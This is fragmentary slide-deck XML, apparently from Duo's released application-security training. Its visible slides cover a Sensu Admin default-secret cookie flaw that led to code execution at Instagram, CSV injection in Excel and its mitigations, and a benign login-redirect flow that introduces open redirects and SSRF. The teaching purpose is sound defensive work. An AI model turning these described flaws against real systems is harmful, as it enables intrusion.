Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hunter2.com/community" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google-gruyere.appspot.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout82.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webgoat.github.io/WebGoat/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.owasp.org/www-project-juice-shop/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/duo-labs/appsec-education/hunter2-lessons" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://flaws2.clou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4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8.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6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hyperlink" Target="https://en.wikipedia.org/wiki/JPEG_File_Interchange_Format#File_format_structure" TargetMode="External"/><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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="361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Best Use This Material...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901" name="Google Shape;901;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="977950"/>
            <a:ext cx="8520600" cy="36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thrilled to be able to release a portion of our Application Security training material to the community! In doing so, we’re cognizant that the content within is unable to meet all team needs, skill levels, or contexts (e.g. software languages).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>To make the most out of this content, we’d offer a few tips:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Take what you like and leave the rest behind -- there’s no one-size-fits-all</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Transfer the content valuable to your organization into more familiar branding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replace the merit of examples shown with ones more akin to your tech stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Share internal examples of previous security issues to increase the impact</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Throw in details about your security program and application security team</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mix-and-match content from other sources to build a training for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> needs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41"/>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SzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Anyone with the Sensu Admin source—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>it’s open source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>—could sign cookies that would be accepted by the admin panel with the default secret</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>The cookie parsing code itself had a vulnerability in it that allowed an attacker to execute arbitrary code on the server</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>A security researcher was able to use these vulnerabilities to fully compromise Instagram!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p1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Sensu Admin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2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Unsafe Downloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1603" name="Google Shape;1603;p231"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125986" y="1129300"/>
            <a:ext cx="4892024" cy="342537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232"/>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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>There’s no general way to mitigate this vulnerability</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The problem with CSV injection is Excel. Data is treated as code, and executed automatically, with little warning to the user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You can try to sanitize outputs and blacklist words, but ultimately this can be subverted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You can also disable macros completely</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" i="1"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>UI/UX and education is the better solution</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Warn the user not to run any macros if prompted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1609" name="Google Shape;1609;p2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Safe Download Mitigations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1610" name="Google Shape;1610;p232"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044100" y="1098999"/>
            <a:ext cx="2413625" cy="24166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33"/>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Open Redirects and SSRF:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Badness with URLs</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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234"/>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Improving UX with Redirects </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1621" name="Google Shape;1621;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="1879325"/>
            <a:ext cx="68430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rPr>
              <a:t>1. A user requests “/users” after their session has invalidated</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  GET /users</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1622" name="Google Shape;1622;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1102438" y="2012500"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1623" name="Google Shape;1623;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="2382388"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1624" name="Google Shape;1624;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128250" y="2444711"/>
            <a:ext cx="68430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rPr>
              <a:t>2. Duo redirects the user to login and with a reference to “/users” after login</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>302 Found</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Location: /login?redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/users</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1625" name="Google Shape;1625;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128250" y="3076525"/>
            <a:ext cx="6843000" cy="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rPr>
              <a:t>3. User logs in</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST /login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     username=user&amp;password=password&amp;redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/users</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1626" name="Google Shape;1626;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8031238" y="2012500"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1627" name="Google Shape;1627;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159750" y="3090363"/>
            <a:ext cx="6848400" cy="15300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1628" name="Google Shape;1628;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="3719195"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1629" name="Google Shape;1629;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="3689675"/>
            <a:ext cx="6843000" cy="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rPr>
              <a:t>4. Redirect user to their original destination</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>302 Found</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/users</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1630" name="Google Shape;1630;p234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="4345163"/>
            <a:ext cx="6848400" cy="15300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
